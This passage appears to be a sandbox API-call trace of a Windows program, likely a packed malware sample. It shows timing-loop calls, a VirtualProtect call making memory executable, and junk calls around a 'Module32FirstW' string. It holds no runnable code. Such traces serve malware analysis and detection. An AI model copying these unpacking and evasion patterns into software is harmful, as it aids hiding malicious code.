lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.221] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.221] GetACP () returned 0x4e4 [0129.221] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.222] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.222] GetACP () returned 0x4e4 [0129.222] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.222] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.222] GetACP () returned 0x4e4 [0129.222] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.222] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.222] GetACP () returned 0x4e4 [0129.222] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.222] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.222] GetACP () returned 0x4e4 [0129.222] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.222] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.222] GetACP () returned 0x4e4 [0129.222] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.222] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.222] GetACP () returned 0x4e4 [0129.222] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.222] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.222] GetACP () returned 0x4e4 [0129.222] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.222] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.222] GetACP () returned 0x4e4 [0129.222] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.223] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.223] GetACP () returned 0x4e4 [0129.223] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.223] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.223] GetACP () returned 0x4e4 [0129.223] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.223] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.223] GetACP () returned 0x4e4 [0129.223] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.223] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.223] GetACP () returned 0x4e4 [0129.223] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.223] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.223] GetACP () returned 0x4e4 [0129.223] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.223] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.223] GetACP () returned 0x4e4 [0129.223] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.223] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.223] GetACP () returned 0x4e4 [0129.223] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.223] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.223] GetACP () returned 0x4e4 [0129.224] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.224] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.224] GetACP () returned 0x4e4 [0129.224] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.224] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.224] GetACP () returned 0x4e4 [0129.224] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.224] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.224] GetACP () returned 0x4e4 [0129.224] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.224] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.224] GetACP () returned 0x4e4 [0129.224] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.224] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.224] GetACP () returned 0x4e4 [0129.224] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.224] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.224] GetACP () returned 0x4e4 [0129.224] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.224] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.224] GetACP () returned 0x4e4 [0129.224] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.224] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.224] GetACP () returned 0x4e4 [0129.225] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.225] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.225] GetACP () returned 0x4e4 [0129.225] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.225] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.225] GetACP () returned 0x4e4 [0129.225] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.225] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.225] GetACP () returned 0x4e4 [0129.225] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.225] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.225] GetACP () returned 0x4e4 [0129.225] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.225] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.225] GetACP () returned 0x4e4 [0129.225] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.225] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.225] GetACP () returned 0x4e4 [0129.225] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.225] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.225] GetACP () returned 0x4e4 [0129.225] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.225] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.225] GetACP () returned 0x4e4 [0129.226] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.226] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.226] GetACP () returned 0x4e4 [0129.226] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.226] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.226] GetACP () returned 0x4e4 [0129.435] VirtualProtect (in: lpAddress=0x5d5ab8, dwSize=0xf540, flNewProtect=0x40, lpflOldProtect=0x43b444 | out: lpflOldProtect=0x43b444*=0x4) returned 1 [0129.436] AddAtomA (lpString=0x0) returned 0x0 [0129.436] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.436] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.436] AddAtomA (lpString=0x0) returned 0x0 [0129.436] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.436] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.436] AddAtomA (lpString=0x0) returned 0x0 [0129.436] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.436] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.436] AddAtomA (lpString=0x0) returned 0x0 [0129.436] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.436] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.436] AddAtomA (lpString=0x0) returned 0x0 [0129.436] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.436] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.437] AddAtomA (lpString=0x0) returned 0x0 [0129.437] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.437] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.437] AddAtomA (lpString=0x0) returned 0x0 [0129.437] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.437] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.437] AddAtomA (lpString=0x0) returned 0x0 [0129.437] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.437] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.437] AddAtomA (lpString=0x0) returned 0x0 [0129.437] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.437] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.437] AddAtomA (lpString=0x0) returned 0x0 [0129.437] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.437] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.437] AddAtomA (lpString=0x0) returned 0x0 [0129.437] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.438] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.438] AddAtomA (lpString=0x0) returned 0x0 [0129.438] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.438] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.438] AddAtomA (lpString=0x0) returned 0x0 [0129.438] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.438] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.438] AddAtomA (lpString=0x0) returned 0x0 [0129.438] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.438] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.438] AddAtomA (lpString=0x0) returned 0x0 [0129.438] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.438] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.438] AddAtomA (lpString=0x0) returned 0x0 [0129.438] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.438] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.438] AddAtomA (lpString=0x0) returned 0x0 [0129.438] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.438] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.438] AddAtomA (lpString=0x0) returned 0x0 [0129.438] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.438] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.438] AddAtomA (lpString=0x0) returned 0x0 [0129.438] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.439] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.439] AddAtomA (lpString=0x0) returned 0x0 [0129.439] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.439] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.439] AddAtomA (lpString=0x0) returned 0x0 [0129.439] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.439] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.439] AddAtomA (lpString=0x0) returned 0x0 [0129.439] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.439] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.439] AddAtomA (lpString=0x0) returned 0x0 [0129.439] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.439] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.439] AddAtomA (lpString=0x0) returned 0x0 [0129.439] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.439] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.439] AddAtomA (lpString=0x0) returned 0x0 [0129.439] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.439] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.439] AddAtomA (lpString=0x0) returned 0x0 [0129.439] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.439] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.439] AddAtomA (lpString=0x0) returned 0x0 [0129.439] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.440] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.440] AddAtomA (lpString=0x0) returned 0x0 [0129.440] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.440] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.440] AddAtomA (lpString=0x0) returned 0x0 [0129.440] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.440] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.440] AddAtomA (lpString=0x0) returned 0x0 [0129.440] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.440] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.440] AddAtomA (lpString=0x0) returned 0x0 [0129.440] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.440] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.440] AddAtomA (lpString=0x0) returned 0x0 [0129.440] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.440] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.440] AddAtomA (lpString=0x0) returned 0x0 [0129.440] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.440] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.440] AddAtomA (lpString=0x0) returned 0x0 [0129.440] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.440] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.440] AddAtomA (lpString=0x0) returned 0x0 [0129.440] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.441] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.441] AddAtomA (lpString=0x0) returned 0x0 [0129.441] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.441] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.441] AddAtomA (lpString=0x0) returned 0x0 [0129.441] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.441] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.441] AddAtomA (lpString=0x0) returned 0x0 [0129.441] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.441] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.441] AddAtomA (lpString=0x0) returned 0x0 [0129.441] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.441] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.441] AddAtomA (lpString=0x0) returned 0x0 [0129.441] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.441] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.441] AddAtomA (lpString=0x0) returned 0x0 [0129.441] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.441] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.441] AddAtomA (lpString=0x0) returned 0x0 [0129.441] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.441] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.441] AddAtomA (lpString=0x0) returned 0x0 [0129.441] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.442] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.442] AddAtomA (lpString=0x0) returned 0x0 [0129.442] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.442] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.442] AddAtomA (lpString=0x0) returned 0x0 [0129.442] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.442] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.442] AddAtomA (lpString=0x0) returned 0x0 [0129.442] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.442] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.442] AddAtomA (lpString=0x0) returned 0x0 [0129.442] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.442] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.442] AddAtomA (lpString=0x0) returned 0x0 [0129.442] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.442] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.442] AddAtomA (lpString=0x0) returned 0x0 [0129.442] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.442] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.442] AddAtomA (lpString=0x0) returned 0x0 [0129.442] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.442] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.442] AddAtomA (lpString=0x0) returned 0x0 [0129.442] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.442] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.443] AddAtomA (lpString=0x0) returned 0x0 [0129.443] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.443] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.443] AddAtomA (lpString=0x0) returned 0x0 [0129.443] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.443] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.443] AddAtomA (lpString=0x0) returned 0x0 [0129.443] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.443] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.443] AddAtomA (lpString=0x0) returned 0x0 [0129.443] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.443] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.443] AddAtomA (lpString=0x0) returned 0x0 [0129.443] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.443] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.443] AddAtomA (lpString=0x0) returned 0x0 [0129.443] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.443] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.443] AddAtomA (lpString=0x0) returned 0x0 [0129.443] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.443] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.443] AddAtomA (lpString=0x0) returned 0x0 [0129.443] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.443] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.443] AddAtomA (lpString=0x0) returned 0x0 [0129.444] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.444] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: 